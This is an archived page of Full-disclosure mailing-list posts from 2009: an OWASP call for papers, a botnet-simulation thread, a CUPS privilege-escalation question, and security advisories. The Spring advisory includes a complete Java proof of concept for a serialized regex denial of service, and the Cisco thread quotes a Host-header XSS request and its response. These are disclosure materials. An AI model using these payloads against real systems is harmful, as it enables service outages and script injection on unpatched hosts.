  I wrote it in PHP because I find it funny to make PHP attack
 apache...
  I set it at 200 processes and it kill my test servers pretty quick.
 have
  fun kiddiez...

 Congratulations! You successfully converted (well partially) a perl
 script to PHP as well as successfully
 proving that you're a lame moron.

 - lolek



[Full-disclosure] *REMINDER* OWASP AppSec DC 2009 CALL FOR PAPERS

2009-06-08 Thread Mark Bristow
Just a reminder that you only have 1 more week to submit for the OWASP
AppSec DC 09 Conference.  You too can be a part of the Premier Application
Security Conference in the US for 2009.

See the message below.

On Tue, Apr 28, 2009 at 12:00 PM, Mark Bristow mark.bris...@owasp.org wrote:

 Colleagues,

 OWASP is currently soliciting papers for the OWASP AppSec DC 2009
 Conference that will take place at the Walter E. Washington Convention
 Center in Washington, DC on November 10th through 13th of 2009.  There
 will be training courses on November 10th and 11th followed by plenary
 sessions on the 12th and 13th with each day having at least three
 tracks. AppSec DC may also have BOF, break out, or speed talks in
 addition to the standard schedule depending on the submissions we receive.

 We are seeking people and organizations that want to present on any of
 the following topics (in no particular order):
  - Business Risks with Application Security.
  - Starting and Managing Secure Development Lifecycle Programs.
  - Web Services-, XML- and Application Security.
  - Metrics for Application Security.
  - Application Threat Modeling.
  - Hands-on Source Code Review.
  - Web Application Security Testing.
  - OWASP Tools and Projects.
  - Secure Coding Practices (J2EE/.NET).
  - Privacy Concerns with Applications and Data Storage
  - Web Application Security countermeasures
  - Technology specific presentations on security such as AJAX, XML, etc.
  - Anything else relating to OWASP and Application Security.

 To make a submission you must include :
  - Presenter(s) name(s)
  - Presenter(s) Email and/or Phone number(s)
  - Presenter(s) bio(s)
  - Title
  - Abstract
  - Any supporting research/tools (will not be released outside of CFP
 committee)

 Submission deadline is June 15th 2009 at 11:59 PM Eastern Standard
 Time.  Submit Proposals To mark.bristow(at)owasp.org with the subject
 line APPSEC DC CFP SUBMISSION (an automated filter is used).
 Additional information can be found in the FAQ.

 Conference Website: https://www.owasp.org/index.php/OWASP_AppSec_DC_2009
 FAQ: https://www.owasp.org/index.php/OWASP_AppSec_DC_2009_-_FAQ
 CFP w/ FAQ: http://www.owasp.org/images/6/65/AppSec_DC_2009_CFP.pdf

 Please forward to all interested practitioners and colleagues.

 Regards,

 --
 Mark Bristow

 OWASP Global Conferences Committee member -
 https://www.owasp.org/index.php/Global_Conferences_Committee
 AppSec DC 09 Organizer -
 https://www.owasp.org/index.php/OWASP_AppSec_DC_2009
 OWASP DC Chapter Co-Chair - http://www.owasp.org/index.php/Washington_DC




-- 
Mark Bristow

OWASP Global Conferences Committee member -
https://www.owasp.org/index.php/Global_Conferences_Committee
AppSec DC 09 Organizer -
https://www.owasp.org/index.php/OWASP_AppSec_DC_2009
OWASP DC Chapter Co-Chair - http://www.owasp.org/index.php/Washington_DC

Re: [Full-disclosure] Howto Simulate a BotNet ?

2009-05-15 Thread Mark Sec
Thanks for your response. Does anyone have the official link to download ns2
(win32/Linux)?

-mark



2009/5/8 Shyaam shy...@gmail.com

 That is a nice tool as such. Many of my friends have tested it, and it
 is really cool.

 Shyaam

 On Fri, May 8, 2009 at 10:00 PM, Tomas L. Byrnes t...@byrneit.net wrote:
  Excuse the toppost:
 
  You might want to look into the work done @ SRI on the BotHunter project
 by Phil Porras, and Farnham Jahanian and others' work @ University of
 Michigan, which led to the creation of Arbor Networks.
 
 
 
 -Original Message-
 From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-
 boun...@lists.grok.org.uk] On Behalf Of Jan G.B.
 Sent: Thursday, May 07, 2009 7:28 AM
 To: Mark Sec
 Cc: valdis.kletni...@vt.edu; Untitled
 Subject: Re: [Full-disclosure] Howto Simulate a BotNet ?
 
 2009/5/7 Mark Sec mark@gmail.com:
  Well, I'm looking for info:
 
  1) See all the traffic (Over botnet)
  2) Administering many slaves (Lab) with the master (lab) via IRC, web,
  etc...
  3) Probe attacks DDoS and DoS (Lab)
  4) Probe remote and Local Exploits
  5) Infected via remote iframe, exploit, XSS etc.
 
  any1 ?
 
  -Mark :-)
 
 
 
 
 Sounds to me, like you're about to test your botnet client in a
 virtual environment.
 
 
 
 
  2009/5/6 Aadil Noorkhan a.noork...@linkbynet.com
 
  Hello,
 
  The closest I could find are:
  - http://pages.cs.wisc.edu/%7Epb/botnets_final.pdf (rather
 interesting
  paper about an inside look at botnets)
  - http://www.breakingpointsystems.com/community/blog/botnet-
 simulation
  (video about a botnet simulation by BreakingPointSystems)
 
  Cheers,
  Aadil.
 
  On Thu, 2009-05-07 at 05:36 +0400, valdis.kletni...@vt.edu wrote:
   On Wed, 06 May 2009 18:07:48 CDT, Mark Sec said:
  
    Does anyone know a tool, schema, info or ideas to simulate a
  botnet?
   
Ideas:
   
A) Many Vmware (workstations) over win32
B) Make a fake traffic
C) Make a scripts to simulate many hosts
D) IDS/ IPS (to see the traffic)
  
   What behavior(s) of a botnet are you trying to simulate?  There's a
 lot
   of approaches, as you've already noticed - which one will work best
 will
   depend a lot on what you're trying to do.
  --
  Aadil NOORKHAN
  Administrateur Unix
  --
  LINKBYNET Indian Ocean
  BG Court, Route Saint-Jean, Quatre Bornes, Ile Maurice
  Tel direct : (+33) 01 48 13 21 78
  Tel : (+33) 1 48 13 00 00
  Fax : (+33) 1 48 13 31 21
  Email : a.noork...@linkbynet.com
  Web : www.linkbynet.com
  __
  Astreinte : http://www.linkbynet.com/astreinte/
 
 
 
 



 --
 Thank you in advance for your time and consideration.
 Kind Regards,
 Shyaam Sundhar R.S.

 Site: www.EvilFingers.com

 Certification History:

 Audit: GPCI
 Legal: GCDS
 Management: GLDR
 Security: SSP-CNSA, SSP-MPA, SSP-GHD, GREM, GHTQ, GWAS, GIPS, GCFA, GCIA,
 GCIH
 Anti-Terrorism: CAS


Re: [Full-disclosure] Howto Simulate a BotNet ?

2009-05-07 Thread Mark Sec
Well, I'm looking for info:

1) See all the traffic (Over botnet)
2) Administering many slaves (Lab) with the master (lab) via IRC, web,
etc...
3) Probe attacks DDoS and DoS (Lab)
4) Probe remote and Local Exploits
5) Infected via remote iframe, exploit, XSS etc.

any1 ?

-Mark :-)




2009/5/6 Aadil Noorkhan a.noork...@linkbynet.com

 Hello,

 The closest I could find are:
 - http://pages.cs.wisc.edu/%7Epb/botnets_final.pdf (rather interesting
 paper about an inside look at botnets)
 - http://www.breakingpointsystems.com/community/blog/botnet-simulation
 (video about a botnet simulation by BreakingPointSystems)

 Cheers,
 Aadil.

 On Thu, 2009-05-07 at 05:36 +0400, valdis.kletni...@vt.edu wrote:
  On Wed, 06 May 2009 18:07:48 CDT, Mark Sec said:
 
   Does anyone know a tool, schema, info or ideas to simulate a botnet?
  
   Ideas:
  
   A) Many Vmware (workstations) over win32
   B) Make a fake traffic
   C) Make a scripts to simulate many hosts
   D) IDS/ IPS (to see the traffic)
 
  What behavior(s) of a botnet are you trying to simulate?  There's a lot
  of approaches, as you've already noticed - which one will work best will
  depend a lot on what you're trying to do.
 --
 Aadil NOORKHAN
 Administrateur Unix
 --
 LINKBYNET Indian Ocean
 BG Court, Route Saint-Jean, Quatre Bornes, Ile Maurice
 Tel direct : (+33) 01 48 13 21 78
 Tel : (+33) 1 48 13 00 00
 Fax : (+33) 1 48 13 31 21
 Email : a.noork...@linkbynet.com
 Web : www.linkbynet.com
 __
 Astreinte : http://www.linkbynet.com/astreinte/



[Full-disclosure] Howto Simulate a BotNet ?

2009-05-06 Thread Mark Sec
Does anyone know a tool, schema, info or ideas to simulate a botnet?

Ideas:

A) Many Vmware (workstations) over win32
B) Make a fake traffic
C) Make a scripts to simulate many hosts
D) IDS/ IPS (to see the traffic)

-mark

[Full-disclosure] OWASP AppSec DC 2009 CALL FOR PAPERS

2009-04-27 Thread Mark Bristow
Colleagues,

OWASP is currently soliciting papers for the OWASP AppSec DC 2009
Conference that will take place at the Walter E. Washington Convention
Center in Washington, DC on November 10th through 13th of 2009.  There
will be training courses on November 10th and 11th followed by plenary
sessions on the 12th and 13th with each day having at least three
tracks. AppSec DC may also have BOF, break out, or speed talks in
addition to the standard schedule depending on the submissions we receive.

We are seeking people and organizations that want to present on any of
the following topics (in no particular order):
 - Business Risks with Application Security.
 - Starting and Managing Secure Development Lifecycle Programs.
 - Web Services-, XML- and Application Security.
 - Metrics for Application Security.
 - Application Threat Modeling.
 - Hands-on Source Code Review.
 - Web Application Security Testing.
 - OWASP Tools and Projects.
 - Secure Coding Practices (J2EE/.NET).
 - Privacy Concerns with Applications and Data Storage
 - Web Application Security countermeasures
 - Technology specific presentations on security such as AJAX, XML, etc.
 - Anything else relating to OWASP and Application Security.

To make a submission you must include :
 - Presenter(s) name(s)
 - Presenter(s) Email and/or Phone number(s)
 - Presenter(s) bio(s)
 - Title
 - Abstract
 - Any supporting research/tools (will not be released outside of CFP
committee)

Submission deadline is June 15th 2009 at 11:59 PM Eastern Standard
Time.  Submit Proposals To mark.bristow(at)owasp.org with the subject
line APPSEC DC CFP SUBMISSION (an automated filter is used). 
Additional information can be found in the FAQ.

Conference Website: https://www.owasp.org/index.php/OWASP_AppSec_DC_2009
FAQ: https://www.owasp.org/index.php/OWASP_AppSec_DC_2009_-_FAQ
CFP w/ FAQ: http://www.owasp.org/images/6/65/AppSec_DC_2009_CFP.pdf

Please forward to all interested practitioners and colleagues.

Regards,

-- 
Mark Bristow

AppSec DC 09 - https://www.owasp.org/index.php/OWASP_AppSec_DC_2009
OWASP DC Chapter Co-Chair - http://www.owasp.org/index.php/Washington_DC
OWASP GCC - https://www.owasp.org/index.php/Global_Conferences_Committee




[Full-disclosure] CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability

2009-04-24 Thread Mark Thomas
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability

Severity: Low

Vendor: SpringSource

Versions Affected:
Spring Framework 1.1.0-2.5.6, 3.0.0.M1-3.0.0.M2
dm Server 1.0.0-1.0.2 (note 2.x not affected since dm Server 2.x requires a 1.6 JDK)

Description:
The j.u.r.Pattern.compile method in the Sun 1.5 JDK has a problem ([1],[2]) with 
exponential compilation times when using optional groups. A workaround [3] was 
implemented in 1.4.2_06, but the root cause of poor performance in regex 
processing was not resolved until JDK 1.6.
JdkRegexpMethodPointcut calls Pattern.compile(source[i]) via its inherited 
readObject method (from AbstractRegexpMethodPointcut). When a Sun JVM 1.5-driven 
application with spring.jar in its classpath accepts serializable data, an 
attacker could use a long regex string with many optional groups to consume 
enormous CPU resources. With a few requests, all listeners will be occupied 
compiling regex expressions forever.

Mitigation:
* Users of all products may upgrade to JRE/JDK 1.6 which includes the fix for 
the root cause
* Spring Framework 2.5.6.SEC01 has been released for Community users that 
includes a workaround to the root cause - see[4] for upgrade steps
* Spring Framework 2.5.6.SR02 is available for Enterprise users that includes a 
workaround to the root cause; The software can be found in the Customer Portal 
[5]
* Disable functionality that accepts serializable data from untrusted sources
* Spring Framework 3.0.0.M3 will be released shortly that includes a workaround 
to the root cause
* dm Server 1.0.2 Community users may replace the Spring Framework 2.5.6 jar 
with 2.5.6.SEC01 - see[4] for upgrade steps
* dm Server 1.0.3 that includes a workaround to the root cause will be released 
shortly
* Instrumented Spring Framework 2.5.6.SR02 that includes a workaround to the 
root cause will be released by April 27, 2009

Example:
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;

import org.springframework.aop.support.JdkRegexpMethodPointcut;

public class DoSSpring {

  static byte[] getSerialized(Object o) throws Exception {
    ByteArrayOutputStream baos = new ByteArrayOutputStream();
    ObjectOutputStream oos = new ObjectOutputStream(baos);
    oos.writeObject(o);
    oos.flush();
    oos.close();
    return baos.toByteArray();
  }

  public static void main(String[] a) throws Exception {
    // A regex made of many optional groups: Pattern.compile() on a Sun 1.5 JDK
    // takes time exponential in the number of groups.
    String thePattern = "(Y)?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)"
        + "?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)?(K)"
        + "?(W)?(I)?(U)?(a)?$";
    // Drop the trailing '$' and append a second copy to double the group count.
    String longerPattern = thePattern.substring(0, thePattern.length() - 1) + thePattern;
    int length = longerPattern.length();
    // setPattern() compiles the regex immediately, which would stall this JVM,
    // so serialize a same-length placeholder of 'A's instead.
    String fakePattern = longerPattern.replaceAll(".", "A");
    JdkRegexpMethodPointcut jrmp = new JdkRegexpMethodPointcut();
    jrmp.setPattern(fakePattern);
    System.out.println(jrmp);
    byte[] theArray = getSerialized(jrmp);
    // Find the placeholder in the serialized stream (first run of two 'A's)...
    int i = 0;
    for (; i < theArray.length - 1; i++) {
      if ((char) theArray[i] == 'A' && (char) theArray[i + 1] == 'A') {
        break;
      }
    }
    // ...and overwrite it in place with the hostile pattern. theArray is now
    // the payload an attacker would send to an application that deserializes
    // untrusted data with spring.jar on its classpath.
    System.arraycopy(longerPattern.getBytes(), 0, theArray, i, length);

    ByteArrayInputStream bis = new ByteArrayInputStream(theArray);
    ObjectInputStream ois = new ObjectInputStream(bis);
    // readObject() reaches AbstractRegexpMethodPointcut.readObject(), which
    // calls Pattern.compile() on the hostile regex.
    Object o = ois.readObject(); // returns after a very very long time
  }
}

Credit:
This issue was discovered by the RedHat Security Response Team

References:
[1] 
http://www.packetstormsecurity.org/hitb06/DAY_1_-_Marc_Schoenefeld_-_Pentesting_Java_J2EE.pdf
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2540
[3] http://archive.cert.uni-stuttgart.de/uniras/2005/01/msg00035.html
[4] http://www.springsource.com/securityadvisory
[5] http://www.springsource.com/spring_account_file
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAknxfZcACgkQb7IeiTPGAkMX0gCdGsE5fqOd0PcMdcYrLTwyejGp
4p0An1Dwr9T+WsCwytVrztkskexVw84T
=zBj5
-END PGP SIGNATURE-



Re: [Full-disclosure] Cisco ASA5520 Web VPN Host Header XSS

2009-04-24 Thread Mark-David McLaughlin (marmclau)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

This is the Cisco PSIRT response to an issue discovered and reported to
Cisco by Bugs NotHugs regarding a cross-site scripting vulnerability in
the Cisco Adaptive Security Appliance (ASA) clientless SSL VPN feature.
Cisco PSIRT greatly appreciates the opportunity to work with researchers
on security vulnerabilities, and welcomes the opportunity to review and
assist in product reports. PSIRT would like to thank Bugs NotHugs for
reporting this issue to us.

Cisco has released an IntelliShield Alert on this vulnerability, which
is available at:
http://tools.cisco.com/security/center/viewAlert.x?alertId=17950
This and other IntelliShield Alerts are available off the Cisco Security
Center (www.cisco.com/security).

Cisco is currently patching this vulnerability as Cisco bug ID
CSCsy82093 and the fixes will be available in 8.0.3.31, 8.1.2.22, and
8.2.0. These images will soon be available for download at either
http://www.cisco.com/cgi-bin/tablebuild.pl/asa or
http://www.cisco.com/cgi-bin/tablebuild.pl/asa-interim

To check on the latest versions with fixed releases please consult the
Cisco Bug Toolkit:
http://tools.cisco.com/Support/BugToolKit/action.do?hdnAction=searchBugs

- -Original Message-
From: Bugs NotHugs [mailto:bugsnoth...@gmail.com] 
Sent: Tuesday, March 31, 2009 6:18 AM
To: bugtraq; fd
Subject: Cisco ASA5520 Web VPN Host Header XSS

- - Cisco ASA5520 Web VPN Host Header XSS

- - Description

Cross-site scripting.

- - Product

Cisco, ASA5520, IOS 7.2(2)22

- - PoC

Modified request:

POST /+webvpn+/index.html HTTP/1.1
Host: '><script>alert('BugsNotHugs')</script><meta httpequiv=
content='www.owasp.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://198.133.219.23/+webvpn+/index.html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR
1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66

username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=


Response:

HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
Content-Length: 5556

<html>
<!--
  Copyright (c) 2004, 2005 by Cisco Systems, Inc.
  All rights reserved.
 -->
<head>


<META http-equiv=PICS-Label content='(PICS-1.1
http://www.rsac.org/ratingsv01.html; l gen true comment RSACi North
America Server for
http://;'><script>alert('BugsNotHugs')</script><meta httpequiv=
content='www.owasp.org/+webvpn+/index.html on
2000.11.02T23:36-0800 r (n 0 s 0 v 0 l 0))'>

<meta http-equiv=Window-target content=_top>
<title>WebVPN Service</title>


- - Solution

None

- - Timeline

2007-09-17: Vulnerability Discovered
2008-02-15: Disclosed to Vendor (auto-reply)
2009-04-02: Disclosed to Public (XSS is so 1999)

- -- 

BugsNotHugs
Shared Vulnerability Disclosure Account

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.9.0 (Build 397)
Charset: utf-8

wj8DBQFJ8dXP86n/Gc8U/uARAsAjAJwNOVQlrSq4+LtHjUh3ziZI24ikzgCfeccr
A139kRwCBvDNYK4EX0Wr30w=
=r3sK
-END PGP SIGNATURE-



[Full-disclosure] CUPS port 631 how to hack

2009-03-31 Thread Mark Sec
Alo,

Well, I have a CUPS opened on the port 631, I have access to administration
pages

Does anyone have tricks/tips to elevate local privileges?

-mark
